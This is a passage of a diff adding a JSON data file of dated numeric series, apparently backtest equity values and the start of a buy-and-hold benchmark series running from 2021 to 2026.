+ [ + "2024-11-18", + 11115.817720413384 + ], + [ + "2024-11-19", + 11160.441506362582 + ], + [ + "2024-11-20", + 11178.090546757028 + ], + [ + "2024-11-21", + 11176.41177829174 + ], + [ + "2024-11-22", + 11188.759880217698 + ], + [ + "2024-11-25", + 11212.673646058645 + ], + [ + "2024-11-26", + 11213.98893431934 + ], + [ + "2024-11-27", + 11215.304376868235 + ], + [ + "2024-11-29", + 11213.629973723426 + ], + [ + "2024-12-02", + 11241.50439806063 + ], + [ + "2024-12-03", + 11242.82306827561 + ], + [ + "2024-12-04", + 11244.141893175502 + ], + [ + "2024-12-05", + 11245.460872778453 + ], + [ + "2024-12-06", + 11246.780007102609 + ], + [ + "2024-12-09", + 11248.099296166121 + ], + [ + "2024-12-10", + 11249.41873998714 + ], + [ + "2024-12-11", + 11250.73833858382 + ], + [ + "2024-12-12", + 11249.068091974314 + ], + [ + "2024-12-13", + 11265.494914548672 + ], + [ + "2024-12-16", + 11266.816398940331 + ], + [ + "2024-12-17", + 11268.138038347017 + ], + [ + "2024-12-18", + 11269.459832786913 + ], + [ + "2024-12-19", + 11267.791782278207 + ], + [ + "2024-12-20", + 11290.449482573908 + ], + [ + "2024-12-23", + 11291.773894229074 + ], + [ + "2024-12-24", + 11293.098461242645 + ], + [ + "2024-12-26", + 11291.433183632847 + ], + [ + "2024-12-27", + 11245.164245450365 + ], + [ + "2024-12-30", + 11202.268262342119 + ], + [ + "2024-12-31", + 11144.110901860991 + ], + [ + "2025-01-02", + 11137.072170499088 + ], + [ + "2025-01-03", + 11233.094525812896 + ], + [ + "2025-01-06", + 11306.210326227589 + ], + [ + "2025-01-07", + 11255.343508732989 + ], + [ + "2025-01-08", + 11283.513642035163 + ], + [ + "2025-01-10", + 11161.691422199476 + ], + [ + "2025-01-13", + 11183.463708427751 + ], + [ + "2025-01-14", + 11189.696519777974 + ], + [ + "2025-01-15", + 11326.208529678934 + ], + [ + "2025-01-16", + 11326.494983854638 + ], + [ + "2025-01-17", + 11366.552812041098 + ], + [ + "2025-01-21", + 11430.682457907349 + ], + [ + "2025-01-22", + 11432.023319411324 + ], + [ + "2025-01-23", + 11433.364338203333 + ], + [ + "2025-01-24", + 11431.715514301826 + ], + [ + "2025-01-27", + 11299.045033844863 + ], + [ + "2025-01-28", + 11403.673486896363 + ], + [ + "2025-01-29", + 11416.210866357487 + ], + [ + "2025-01-30", + 11462.073995869687 + ], + [ + "2025-01-31", + 11485.96699908677 + ], + [ + "2025-02-03", + 11491.08131555984 + ], + [ + "2025-02-04", + 11530.838639947242 + ], + [ + "2025-02-05", + 11532.191250143334 + ], + [ + "2025-02-06", + 11533.544019005625 + ], + [ + "2025-02-07", + 11531.906946552728 + ], + [ + "2025-02-10", + 11575.7920150971 + ], + [ + "2025-02-11", + 11577.149898491047 + ], + [ + "2025-02-12", + 11578.507941169757 + ], + [ + "2025-02-13", + 11579.866143151918 + ], + [ + "2025-02-14", + 11578.234504456215 + ], + [ + "2025-02-18", + 11613.532968346257 + ], + [ + "2025-02-19", + 11614.895278894182 + ], + [ + "2025-02-20", + 11616.257749246195 + ], + [ + "2025-02-21", + 11614.63037942104 + ], + [ + "2025-02-24", + 11601.382845851058 + ], + [ + "2025-02-25", + 11559.513035488431 + ], + [ + "2025-02-26", + 11592.33494044022 + ], + [ + "2025-02-27", + 11316.387298999827 + ], + [ + "2025-02-28", + 11476.868662522425 + ], + [ + "2025-03-03", + 11315.522956123174 + ], + [ + "2025-03-04", + 11303.85450715089 + ], + [ + "2025-03-05", + 11386.414197131586 + ], + [ + "2025-03-06", + 11196.88381443016 + ], + [ + "2025-03-07", + 11262.091348056787 + ], + [ + "2025-03-10", + 10905.048954568389 + ], + [ + "2025-03-11", + 10900.495145250135 + ], + [ + "2025-03-12", + 10962.11685961843 + ], + [ + "2025-03-13", + 10876.126319572113 + ], + [ + "2025-03-14", + 11001.664426339632 + ], + [ + "2025-03-17", + 11077.945681654352 + ], + [ + "2025-03-18", + 11032.367091435648 + ], + [ + "2025-03-19", + 11084.486670162509 + ], + [ + "2025-03-20", + 11088.188053651198 + ], + [ + "2025-03-21", + 11113.454904834634 + ], + [ + "2025-03-24", + 11152.785660395339 + ], + [ + "2025-03-25", + 11180.775949508596 + ], + [ + "2025-03-26", + 11133.692133892833 + ], + [ + "2025-03-27", + 11133.458990911664 + ], + [ + "2025-03-28", + 10991.1356198427 + ], + [ + "2025-03-31", + 11012.094637306916 + ], + [ + "2025-04-01", + 11055.488699837895 + ], + [ + "2025-04-02", + 11097.863513420578 + ], + [ + "2025-04-03", + 10768.638507491016 + ], + [ + "2025-04-04", + 10417.809340791484 + ], + [ + "2025-04-07", + 10463.029684723077 + ], + [ + "2025-04-08", + 10403.005602248048 + ], + [ + "2025-04-09", + 10578.301255695009 + ], + [ + "2025-04-10", + 10565.63568134969 + ], + [ + "2025-04-11", + 10585.69689842619 + ], + [ + "2025-04-14", + 10663.005701703702 + ], + [ + "2025-04-15", + 10688.32548490315 + ], + [ + "2025-04-16", + 10689.579265177199 + ], + [ + "2025-04-17", + 10690.833192524333 + ], + [ + "2025-04-21", + 10689.0972669618 + ], + [ + "2025-04-22", + 10753.682819311427 + ], + [ + "2025-04-23", + 10796.596195300815 + ], + [ + "2025-04-24", + 10797.862676131295 + ], + [ + "2025-04-25", + 10799.12930552468 + ], + [ + "2025-04-28", + 10797.406083498397 + ], + [ + "2025-04-29", + 10837.254784447563 + ], + [ + "2025-04-30", + 10861.245532718352 + ], + [ + "2025-05-01", + 10910.487903530991 + ], + [ + "2025-05-02", + 10911.767744281822 + ], + [ + "2025-05-05", + 10910.057735162725 + ], + [ + "2025-05-06", + 10898.300309745926 + ], + [ + "2025-05-07", + 10937.221769952539 + ], + [ + "2025-05-08", + 11061.730133274576 + ], + [ + "2025-05-09", + 11063.027715300643 + ], + [ + "2025-05-12", + 11064.3254495379 + ], + [ + "2025-05-13", + 11065.623336004204 + ], + [ + "2025-05-14", + 11066.92137471741 + ], + [ + "2025-05-15", + 11068.219565695379 + ], + [ + "2025-05-16", + 11069.51790895597 + ], + [ + "2025-05-19", + 11070.816404517047 + ], + [ + "2025-05-20", + 11072.115052396477 + ], + [ + "2025-05-21", + 11070.423852612124 + ], + [ + "2025-05-22", + 11090.223633808922 + ], + [ + "2025-05-23", + 11073.275063146346 + ], + [ + "2025-05-27", + 11118.795957770662 + ], + [ + "2025-05-28", + 11117.110233829877 + ], + [ + "2025-05-29", + 11129.779332092869 + ], + [ + "2025-05-30", + 11135.183572971031 + ], + [ + "2025-06-02", + 11164.733091206695 + ], + [ + "2025-06-03", + 11166.042755862265 + ], + [ + "2025-06-04", + 11167.352574146362 + ], + [ + "2025-06-05", + 11168.662546077008 + ], + [ + "2025-06-06", + 11169.972671672227 + ], + [ + "2025-06-09", + 11171.282950950044 + ], + [ + "2025-06-10", + 11172.593383928486 + ], + [ + "2025-06-11", + 11173.903970625583 + ], + [ + "2025-06-12", + 11175.214711059367 + ], + [ + "2025-06-13", + 11176.52560524787 + ], + [ + "2025-06-16", + 11177.836653209131 + ], + [ + "2025-06-17", + 11179.147854961187 + ], + [ + "2025-06-18", + 11180.459210522078 + ], + [ + "2025-06-20", + 11181.770719909848 + ], + [ + "2025-06-23", + 11183.082383142539 + ], + [ + "2025-06-24", + 11184.394200238197 + ], + [ + "2025-06-25", + 11185.706171214873 + ], + [ + "2025-06-26", + 11187.018296090619 + ], + [ + "2025-06-27", + 11188.330574883485 + ], + [ + "2025-06-30", + 11189.643007611527 + ], + [ + "2025-07-01", + 11190.955594292802 + ], + [ + "2025-07-02", + 11192.26833494537 + ], + [ + "2025-07-03", + 11193.58122958729 + ], + [ + "2025-07-07", + 11194.894278236627 + ], + [ + "2025-07-08", + 11196.207480911447 + ], + [ + "2025-07-09", + 11197.52083762982 + ], + [ + "2025-07-10", + 11198.834348409811 + ], + [ + "2025-07-11", + 11200.148013269496 + ], + [ + "2025-07-14", + 11201.461832226949 + ], + [ + "2025-07-15", + 11202.775805300244 + ], + [ + "2025-07-16", + 11204.08993250746 + ], + [ + "2025-07-17", + 11205.40421386668 + ], + [ + "2025-07-18", + 11206.718649395982 + ], + [ + "2025-07-21", + 11208.033239113454 + ], + [ + "2025-07-22", + 11209.347983037182 + ], + [ + "2025-07-23", + 11210.662881185255 + ], + [ + "2025-07-24", + 11211.977933575765 + ], + [ + "2025-07-25", + 11213.293140226802 + ], + [ + "2025-07-28", + 11214.608501156465 + ], + [ + "2025-07-29", + 11215.924016382849 + ], + [ + "2025-07-30", + 11217.239685924056 + ], + [ + "2025-07-31", + 11218.555509798187 + ], + [ + "2025-08-01", + 11219.871488023344 + ], + [ + "2025-08-04", + 11221.187620617635 + ], + [ + "2025-08-05", + 11222.503907599166 + ], + [ + "2025-08-06", + 11223.82034898605 + ], + [ + "2025-08-07", + 11225.136944796397 + ], + [ + "2025-08-08", + 11226.453695048322 + ], + [ + "2025-08-11", + 11227.77059975994 + ], + [ + "2025-08-12", + 11229.087658949373 + ], + [ + "2025-08-13", + 11230.404872634741 + ], + [ + "2025-08-14", + 11231.722240834166 + ], + [ + "2025-08-15", + 11233.039763565772 + ], + [ + "2025-08-18", + 11234.357440847689 + ], + [ + "2025-08-19", + 11235.675272698045 + ], + [ + "2025-08-20", + 11236.99325913497 + ], + [ + "2025-08-21", + 11238.311400176599 + ], + [ + "2025-08-22", + 11239.629695841068 + ], + [ + "2025-08-25", + 11240.948146146513 + ], + [ + "2025-08-26", + 11242.266751111076 + ], + [ + "2025-08-27", + 11243.585510752899 + ], + [ + "2025-08-28", + 11244.904425090126 + ], + [ + "2025-08-29", + 11246.223494140902 + ], + [ + "2025-09-02", + 11247.542717923377 + ], + [ + "2025-09-03", + 11248.862096455701 + ], + [ + "2025-09-04", + 11250.181629756027 + ], + [ + "2025-09-05", + 11251.501317842509 + ], + [ + "2025-09-08", + 11252.821160733305 + ], + [ + "2025-09-09", + 11254.141158446573 + ], + [ + "2025-09-10", + 11255.461311000476 + ], + [ + "2025-09-11", + 11256.781618413175 + ], + [ + "2025-09-12", + 11258.102080702838 + ], + [ + "2025-09-15", + 11259.422697887632 + ], + [ + "2025-09-16", + 11260.743469985726 + ], + [ + "2025-09-17", + 11262.064397015292 + ], + [ + "2025-09-18", + 11263.385478994505 + ], + [ + "2025-09-19", + 11264.70671594154 + ], + [ + "2025-09-22", + 11266.028107874576 + ], + [ + "2025-09-23", + 11267.349654811793 + ], + [ + "2025-09-24", + 11268.671356771374 + ], + [ + "2025-09-25", + 11269.993213771504 + ], + [ + "2025-09-26", + 11271.315225830369 + ], + [ + "2025-09-29", + 11272.637392966157 + ], + [ + "2025-09-30", + 11273.959715197061 + ], + [ + "2025-10-01", + 11275.282192541274 + ], + [ + "2025-10-02", + 11276.60482501699 + ], + [ + "2025-10-03", + 11277.927612642408 + ], + [ + "2025-10-06", + 11279.250555435727 + ], + [ + "2025-10-07", + 11280.57365341515 + ], + [ + "2025-10-08", + 11281.896906598879 + ], + [ + "2025-10-09", + 11283.22031500512 + ], + [ + "2025-10-10", + 11284.54387865208 + ], + [ + "2025-10-13", + 11285.867597557975 + ], + [ + "2025-10-14", + 11287.191471741013 + ], + [ + "2025-10-15", + 11285.525501219408 + ], + [ + "2025-10-16", + 11284.578924971596 + ], + [ + "2025-10-17", + 11313.932557164677 + ], + [ + "2025-10-20", + 11340.355892947908 + ], + [ + "2025-10-21", + 11341.686158810355 + ], + [ + "2025-10-22", + 11340.026580717928 + ], + [ + "2025-10-23", + 11368.559587938678 + ], + [ + "2025-10-24", + 11369.893162199292 + ], + [ + "2025-10-27", + 11371.226892893119 + ], + [ + "2025-10-28", + 11372.56078003851 + ], + [ + "2025-10-29", + 11373.894823653816 + ], + [ + "2025-10-30", + 11372.239023757393 + ], + [ + "2025-10-31", + 11403.441628470115 + ], + [ + "2025-11-03", + 11443.2291005043 + ], + [ + "2025-11-04", + 11444.57143377605 + ], + [ + "2025-11-05", + 11445.913924508475 + ], + [ + "2025-11-06", + 11444.26657272005 + ], + [ + "2025-11-07", + 11476.090640363655 + ], + [ + "2025-11-10", + 11535.805298939864 + ], + [ + "2025-11-11", + 11537.158491743501 + ], + [ + "2025-11-12", + 11538.51184328168 + ], + [ + "2025-11-13", + 11536.87535357302 + ], + [ + "2025-11-14", + 11550.697847763697 + ], + [ + "2025-11-17", + 11561.45723944536 + ], + [ + "2025-11-18", + 11514.192169872162 + ], + [ + "2025-11-19", + 11574.785404747747 + ], + [ + "2025-11-20", + 11573.15317006256 + ], + [ + "2025-11-21", + 11606.516035362094 + ], + [ + "2025-11-24", + 11642.757474022641 + ], + [ + "2025-11-25", + 11644.123212713617 + ], + [ + "2025-11-26", + 11645.489111610814 + ], + [ + "2025-11-28", + 11643.865170733025 + ], + [ + "2025-12-01", + 11675.768361383994 + ], + [ + "2025-12-02", + 11709.71155252989 + ], + [ + "2025-12-03", + 11711.085145182933 + ], + [ + "2025-12-04", + 11712.458898963494 + ], + [ + "2025-12-05", + 11710.842813890476 + ], + [ + "2025-12-08", + 11740.305228898826 + ], + [ + "2025-12-09", + 11761.506113563004 + ], + [ + "2025-12-10", + 11762.885781910412 + ], + [ + "2025-12-11", + 11764.265612098041 + ], + [ + "2025-12-12", + 11765.645604144875 + ], + [ + "2025-12-15", + 11767.0257580699 + ], + [ + "2025-12-16", + 11768.406073892107 + ], + [ + "2025-12-17", + 11766.796551630487 + ], + [ + "2025-12-18", + 11800.486058718523 + ], + [ + "2025-12-19", + 11801.870299558263 + ], + [ + "2025-12-22", + 11803.254702774593 + ], + [ + "2025-12-23", + 11804.639268386563 + ], + [ + "2025-12-24", + 11806.023996413222 + ], + [ + "2025-12-26", + 11807.40888687362 + ], + [ + "2025-12-29", + 11808.793939786812 + ], + [ + "2025-12-30", + 11810.179155171854 + ], + [ + "2025-12-31", + 11811.564533047806 + ], + [ + "2026-01-02", + 11812.950073433727 + ], + [ + "2026-01-05", + 11814.335776348682 + ], + [ + "2026-01-06", + 11815.721641811735 + ], + [ + "2026-01-07", + 11817.107669841953 + ], + [ + "2026-01-08", + 11818.493860458408 + ], + [ + "2026-01-09", + 11819.88021368017 + ], + [ + "2026-01-12", + 11821.266729526313 + ], + [ + "2026-01-13", + 11822.653408015914 + ], + [ + "2026-01-14", + 11824.040249168052 + ], + [ + "2026-01-15", + 11825.427253001808 + ], + [ + "2026-01-16", + 11826.814419536264 + ], + [ + "2026-01-20", + 11828.201748790507 + ], + [ + "2026-01-21", + 11829.589240783624 + ], + [ + "2026-01-22", + 11830.976895534704 + ], + [ + "2026-01-23", + 11832.36471306284 + ], + [ + "2026-01-26", + 11833.752693387125 + ], + [ + "2026-01-27", + 11835.140836526658 + ], + [ + "2026-01-28", + 11836.529142500536 + ], + [ + "2026-01-29", + 11837.91761132786 + ], + [ + "2026-01-30", + 11839.306243027735 + ], + [ + "2026-02-02", + 11840.695037619265 + ], + [ + "2026-02-03", + 11842.083995121558 + ], + [ + "2026-02-04", + 11843.473115553727 + ], + [ + "2026-02-05", + 11844.86239893488 + ], + [ + "2026-02-06", + 11843.261845284133 + ], + [ + "2026-02-09", + 11884.367014737698 + ], + [ + "2026-02-10", + 11885.761095125099 + ], + [ + "2026-02-11", + 11887.155339043306 + ], + [ + "2026-02-12", + 11888.549746511502 + ], + [ + "2026-02-13", + 11886.954317548874 + ], + [ + "2026-02-17", + 11923.334234181075 + ], + [ + "2026-02-18", + 11924.732885568033 + ], + [ + "2026-02-19", + 11926.131701021994 + ], + [ + "2026-02-20", + 11927.530680562202 + ], + [ + "2026-02-23", + 11928.929824207906 + ], + [ + "2026-02-24", + 11927.339131978357 + ], + [ + "2026-02-25", + 11961.58497207414 + ], + [ + "2026-02-26", + 11962.988110414712 + ], + [ + "2026-02-27", + 11964.391413348621 + ], + [ + "2026-03-02", + 11965.794880895177 + ], + [ + "2026-03-03", + 11964.208513073687 + ], + [ + "2026-03-04", + 12000.667838302283 + ], + [ + "2026-03-05", + 12002.075561208208 + ], + [ + "2026-03-06", + 12003.48344924526 + ], + [ + "2026-03-09", + 12004.891502432805 + ], + [ + "2026-03-10", + 12006.29972079022 + ], + [ + "2026-03-11", + 12007.70810433688 + ], + [ + "2026-03-12", + 12009.116653092158 + ], + [ + "2026-03-13", + 12010.525367075437 + ], + [ + "2026-03-16", + 12011.934246306098 + ], + [ + "2026-03-17", + 12013.343290803525 + ], + [ + "2026-03-18", + 12014.752500587105 + ], + [ + "2026-03-19", + 12016.161875676225 + ], + [ + "2026-03-20", + 12014.58141609028 + ], + [ + "2026-03-23", + 12050.834707525588 + ], + [ + "2026-03-24", + 12052.248315191586 + ], + [ + "2026-03-25", + 12053.662088679013 + ], + [ + "2026-03-26", + 12055.076028007321 + ], + [ + "2026-03-27", + 12053.500133195963 + ], + [ + "2026-03-30", + 12059.496785369398 + ], + [ + "2026-03-31", + 12099.064688440993 + ], + [ + "2026-04-01", + 12100.48395366287 + ], + [ + "2026-04-02", + 12101.90338536983 + ], + [ + "2026-04-06", + 12100.332983581398 + ], + [ + "2026-04-07", + 12117.723691047368 + ], + [ + "2026-04-08", + 12165.720729390196 + ], + [ + "2026-04-09", + 12167.147813613226 + ], + [ + "2026-04-10", + 12168.575065238536 + ], + [ + "2026-04-13", + 12167.012484285762 + ], + [ + "2026-04-14", + 12227.58726732879 + ], + [ + "2026-04-15", + 12229.021608726483 + ], + [ + "2026-04-16", + 12230.45611837775 + ], + [ + "2026-04-17", + 12231.890796302325 + ], + [ + "2026-04-20", + 12233.325642519949 + ], + [ + "2026-04-21", + 12234.760657050363 + ], + [ + "2026-04-22", + 12236.195839913311 + ], + [ + "2026-04-23", + 12237.63119112854 + ] + ], + "benchmark_bh": [ + [ + "2021-04-01", + 10000.0 + ], + [ + "2021-04-05", + 10199.647941704976 + ], + [ + "2021-04-06", + 10192.56336923354 + ], + [ + "2021-04-07", + 10217.212100589302 + ], + [ + "2021-04-08", + 10323.813988116288 + ], + [ + "2021-04-09", + 10386.358206138193 + ], + [ + "2021-04-12", + 10372.803341685869 + ], + [ + "2021-04-13", + 10493.884421091021 + ], + [ + "2021-04-14", + 10367.873595414716 + ], + [ + "2021-04-15", + 10525.001506634326 + ], + [ + "2021-04-16", + 10537.327810105553 + ], + [ + "2021-04-19", + 10440.891586469474 + ], + [ + "2021-04-20", + 10364.7905662019 + ], + [ + "2021-04-21", + 10453.525030185976 + ], + [ + "2021-04-22", + 10327.512266716325 + ], + [ + "2021-04-23", + 10457.529480134615 + ], + [ + "2021-04-26", + 10525.618693814893 + ], + [ + "2021-04-27", + 10480.021447496749 + ], + [ + "2021-04-28", + 10444.58986506951 + ], + [ + "2021-04-29", + 10482.178211490378 + ], + [ + "2021-04-30", + 10413.469872836187 + ], + [ + "2021-05-03", + 10358.01410287241 + ], + [ + "2021-05-04", + 10171.614854271158 + ], + [ + "2021-05-05", + 10137.41280172169 + ], + [ + "2021-05-06", + 10213.821931131211 + ], + [ + "2021-05-07", + 10296.70135252162 + ], + [ + "2021-05-10", + 10036.664018995025 + ], + [ + "2021-05-11", + 10022.800076504082 + ], + [ + "2021-05-12", + 9763.38283684807 + ], + [ + "2021-05-13", + 9838.862794348386 + ], + [ + "2021-05-14", + 10056.074894937688 + ], + [ + "2021-05-17", + 9995.072191522193 + ], + [ + "2021-05-18", + 9927.598227229135 + ], + [ + "2021-05-19", + 9938.994389894486 + ], + [ + "2021-05-20", + 10131.249649986077 + ], + [ + "2021-05-21", + 10075.17572394506 + ], + [ + "2021-05-24", + 10244.634783119262 + ], + [ + "2021-05-25", + 10258.804896958807 + ], + [ + "2021-05-26", + 10294.544588527991 + ], + [ + "2021-05-27", + 10256.032883577956 + ], + [ + "2021-05-28", + 10288.382405689052 + ], + [ + "2021-06-01", + 10254.18229093293 + ], + [ + "2021-06-02", + 10274.209385159487 + ], + [ + "2021-06-03", + 10167.300357387227 + ], + [ + "2021-06-04", + 10339.834694600862 + ], + [ + "2021-06-07", + 10370.645608795567 + ], + [ + "2021-06-08", + 10375.574386170047 + ], + [ + "2021-06-09", + 10378.03829040895 + ], + [ + "2021-06-10", + 10486.18363033569 + ], + [ + "2021-06-11", + 10513.604375072304 + ], + [ + "2021-06-14", + 10614.351220005623 + ], + [ + "2021-06-15", + 10545.031507550902 + ], + [ + "2021-06-16", + 10506.517864807522 + ], + [ + "2021-06-17", + 10639.925247683901 + ], + [ + "2021-06-18", + 10556.429608009597 + ], + [ + "2021-06-21", + 10622.038446207534 + ], + [ + "2021-06-22", + 10721.052903889908 + ], + [ + "2021-06-23", + 10726.296572683044 + ], + [ + "2021-06-24", + 10792.614643245463 + ], + [ + "2021-06-25", + 10779.350447794975 + ], + [ + "2021-06-28", + 10910.445074313406 + ], + [ + "2021-06-29", + 10949.929551522922 + ], + [ + "2021-06-30", + 10932.654123847085 + ], + [ + "2021-07-01", + 10936.972496317709 + ], + [ + "2021-07-02", + 11062.517282694402 + ], + [ + "2021-07-06", + 11110.324582323177 + ], + [ + "2021-07-07", + 11133.769944011337 + ], + [ + "2021-07-08", + 11066.525608229731 + ], + [ + "2021-07-09", + 11135.620536656364 + ], + [ + "2021-07-12", + 11179.112370504537 + ], + [ + "2021-07-13", + 11179.112370504537 + ], + [ + "2021-07-14", + 11199.162718251242 + ], + [ + "2021-07-15", + 11120.504779664176 + ], + [ + "2021-07-16", + 11030.43614496167 + ], + [ + "2021-07-19", + 10940.058432220543 + ], + [ + "2021-07-20", + 11067.142795410298 + ], + [ + "2021-07-21", + 11152.585917396907 + ], + [ + "2021-07-22", + 11226.305389642766 + ], + [ + "2021-07-23", + 11357.40098505787 + ], + [ + "2021-07-26", + 11366.345839141062 + ], + [ + "2021-07-27", + 11241.110130802988 + ], + [ + "2021-07-28", + 11284.294824405888 + ], + [ + "2021-07-29", + 11304.346141049265 + ], + [ + "2021-07-30", + 11245.430441066957 + ], + [ + "2021-08-02", + 11246.35864407949 + ], + [ + "2021-08-03", + 11314.524400596918 + ], + [ + "2021-08-04", + 11330.873563053567 + ], + [ + "2021-08-05", + 11402.744380447743 + ], + [ + "2021-08-06", + 11352.770627858608 + ], + [ + "2021-08-09", + 11373.749178617845 + ], + [ + "2021-08-10", + 11315.451634712777 + ], + [ + "2021-08-11", + 11296.01847414664 + ], + [ + "2021-08-12", + 11336.73441902727 + ], + [ + "2021-08-13", + 11376.524098688715 + ], + [ + "2021-08-16", + 11381.46159613325 + ], + [ + "2021-08-17", + 11281.213732986416 + ], + [ + "2021-08-18", + 11172.637234040285 + ], + [ + "2021-08-19", + 11226.615436578059 + ], + [ + "2021-08-20", + 11342.902415246248 + ], + [ + "2021-08-23", + 11512.55622265168 + ], + [ + "2021-08-24", + 11547.718451803883 + ], + [ + "2021-08-25", + 11560.984585047716 + ], + [ + "2021-08-26", + 11487.57128415046 + ], + [ + "2021-08-27", + 11599.230812309406 + ], + [ + "2021-08-30", + 11729.39917360865 + ], + [ + "2021-08-31", + 11719.838101241563 + ], + [ + "2021-09-01", + 11739.272230704375 + ], + [ + "2021-09-02", + 11733.717546079273 + ], + [ + "2021-09-03", + 11769.810884934024 + ], + [ + "2021-09-07", + 11786.46428094593 + ], + [ + "2021-09-08", + 11745.438289130007 + ], + [ + "2021-09-09", + 11705.032391184668 + ], + [ + "2021-09-10", + 11616.19619304995 + ], + [ + "2021-09-13", + 11608.174697495926 + ], + [ + "2021-09-14", + 11575.173107924044 + ], + [ + "2021-09-15", + 11661.232448194549 + ], + [ + "2021-09-16", + 11669.249099265207 + ], + [ + "2021-09-17", + 11531.06214910196 + ], + [ + "2021-09-20", + 11292.79204822625 + ], + [ + "2021-09-21", + 11306.68893320407 + ], + [ + "2021-09-22", + 11412.298670538119 + ], + [ + "2021-09-23", + 11517.597392040203 + ], + [ + "2021-09-24", + 11528.406403321844 + ], + [ + "2021-09-27", + 11436.384472926993 + ], + [ + "2021-09-28", + 11112.762326351916 + ], + [ + "2021-09-29", + 11094.543193316784 + ], + [ + "2021-09-30", + 11053.782679189204 + ], + [ + "2021-10-01", + 11122.335994375748 + ], + [ + "2021-10-04", + 10888.882278860478 + ], + [ + "2021-10-05", + 11035.874561986036 + ], + [ + "2021-10-06", + 11106.586578959555 + ], + [ + "2021-10-07", + 11208.491255416859 + ], + [ + "2021-10-08", + 11152.598513053654 + ], + [ + "2021-10-11", + 11067.061408089783 + ], + [ + "2021-10-12", + 11028.46347133587 + ], + [ + "2021-10-13", + 11116.77549637061 + ], + [ + "2021-10-14", + 11321.511114504403 + ], + [ + "2021-10-15", + 11392.843225348508 + ], + [ + "2021-10-18", + 11507.406536835804 + ], + [ + "2021-10-19", + 11594.488063096102 + ], + [ + "2021-10-20", + 11579.358741550494 + ], + [ + "2021-10-21", + 11650.07269631736 + ], + [ + "2021-10-22", + 11552.181189878751 + ], + [ + "2021-10-25", + 11670.454406726158 + ], + [ + "2021-10-26", + 11707.199813041698 + ], + [ + "2021-10-27", + 11734.374458023423 + ], + [ + "2021-10-28", + 11864.688153823587 + ], + [ + "2021-10-29", + 11923.050613805732 + ], + [ + "2021-11-01", + 11963.812096829983 + ], + [ + "2021-11-02", + 12013.838169839448 + ], + [ + "2021-11-03", + 12141.374038878723 + ], + [ + "2021-11-04", + 12297.008880325564 + ], + [ + "2021-11-05", + 12308.741250136372 + ], + [ + "2021-11-08", + 12292.06460060432 + ], + [ + "2021-11-09", + 12207.455698652982 + ], + [ + "2021-11-10", + 12028.044132855886 + ], + [ + "2021-11-11", + 12061.395494126646 + ], + [ + "2021-11-12", + 12188.312238192007 + ], + [ + "2021-11-15", + 12185.532473637775 + ], + [ + "2021-11-16", + 12272.305890756124 + ], + [ + "2021-11-17", + 12278.787809497086 + ], + [ + "2021-11-18", + 12406.015569394414 + ], + [ + "2021-11-19", + 12475.18413396818 + ], + [ + "2021-11-22", + 12330.35927269965 + ], + [ + "2021-11-23", + 12274.15551450448 + ], + [ + "2021-11-24", + 12313.685529857617 + ], + [ + "2021-11-26", + 12080.231814342345 + ], + [ + "2021-11-29", + 12342.40168944575 + ], + [ + "2021-11-30", + 12161.135655416936 + ], + [ + "2021-12-01", + 11954.240366599497 + ], + [ + "2021-12-02", + 12040.395627640606 + ], + [ + "2021-12-03", + 11831.033527894244 + ], + [ + "2021-12-06", + 11925.830378359964 + ], + [ + "2021-12-07", + 12284.966463579465 + ], + [ + "2021-12-08", + 12339.929065136792 + ], + [ + "2021-12-09", + 12158.355890862704 + ], + [ + "2021-12-10", + 12290.52211710124 + ], + [ + "2021-12-13", + 12112.963081742519 + ], + [ + "2021-12-14", + 11987.592696766927 + ], + [ + "2021-12-15", + 12260.876785603901 + ], + [ + "2021-12-16", + 11945.59296379485 + ], + [ + "2021-12-17", + 11885.994191658227 + ], + [ + "2021-12-20", + 11770.699363182974 + ], + [ + "2021-12-21", + 12034.127835064332 + ], + [ + "2021-12-22", + 12180.689928067173 + ], + [ + "2021-12-23", + 12272.520016920811 + ], + [ + "2021-12-27", + 12475.351753092573 + ], + [ + "2021-12-28", + 12417.53187524719 + ], + [ + "2021-12-29", + 12415.676438118799 + ], + [ + "2021-12-30", + 12378.574477827671 + ], + [ + "2021-12-31", + 12301.274932375856 + ], + [ + "2022-01-03", + 12419.693483724182 + ], + [ + "2022-01-04", + 12258.605691802883 + ], + [ + "2022-01-05", + 11882.007181849698 + ], + [ + "2022-01-06", + 11873.65819922027 + ], + [ + "2022-01-07", + 11745.035228114126 + ], + [ + "2022-01-10", + 11752.766054666314 + ], + [ + "2022-01-11", + 11929.313561898642 + ], + [ + "2022-01-12", + 11976.619941947587 + ], + [ + "2022-01-13", + 11677.010930510924 + ], + [ + "2022-01-14", + 11749.674305383442 + ], + [ + "2022-01-18", + 11457.175057731709 + ], + [ + "2022-01-19", + 11331.334757869814 + ], + [ + "2022-01-20", + 11184.155477686407 + ], + [ + "2022-01-21", + 10874.035875143323 + ], + [ + "2022-01-24", + 10923.819723984592 + ], + [ + "2022-01-25", + 10670.58501399765 + ], + [ + "2022-01-26", + 10653.89189322216 + ], + [ + "2022-01-27", + 10546.598213470803 + ], + [ + "2022-01-28", + 10877.436702464815 + ], + [ + "2022-01-31", + 11225.280296962954 + ], + [ + "2022-02-01", + 11301.650670505565 + ], + [ + "2022-02-02", + 11393.47979046253 + ], + [ + "2022-02-03", + 10931.546674950087 + ], + [ + "2022-02-04", + 11069.446831698191 + ], + [ + "2022-02-07", + 10980.400382985477 + ], + [ + "2022-02-08", + 11103.767089641738 + ], + [ + "2022-02-09", + 11339.062677731983 + ], + [ + "2022-02-10", + 11082.432953803587 + ], + [ + "2022-02-11", + 10730.878485048665 + ], + [ + "2022-02-14", + 10744.173685192682 + ], + [ + "2022-02-15", + 11011.31884471086 + ], + [ + "2022-02-16", + 11008.534235673264 + ], + [ + "2022-02-17", + 10681.101418484106 + ], + [ + "2022-02-18", + 10559.276226434253 + ], + [ + "2022-02-22", + 10453.222734424065 + ], + [ + "2022-02-23", + 10185.461356621992 + ], + [ + "2022-02-24", + 10527.73960863163 + ], + [ + "2022-02-25", + 10690.992884616615 + ], + [ + "2022-02-28", + 10722.83954935453 + ], + [ + "2022-03-01", + 10558.65710146034 + ], + [ + "2022-03-02", + 10735.827609253272 + ], + [ + "2022-03-03", + 10582.467737194142 + ], + [ + "2022-03-04", + 10429.107865135009 + ], + [ + "2022-03-07", + 10044.466543900999 + ], + [ + "2022-03-08", + 9997.781226619312 + ], + [ + "2022-03-09", + 10357.680802416971 + ], + [ + "2022-03-10", + 10242.660171700118 + ], + [ + "2022-03-11", + 10030.244109641122 + ], + [ + "2022-03-14", + 9837.62066881387 + ], + [ + "2022-03-15", + 10146.192943370508 + ], + [ + "2022-03-16", + 10522.486250871765 + ], + [ + 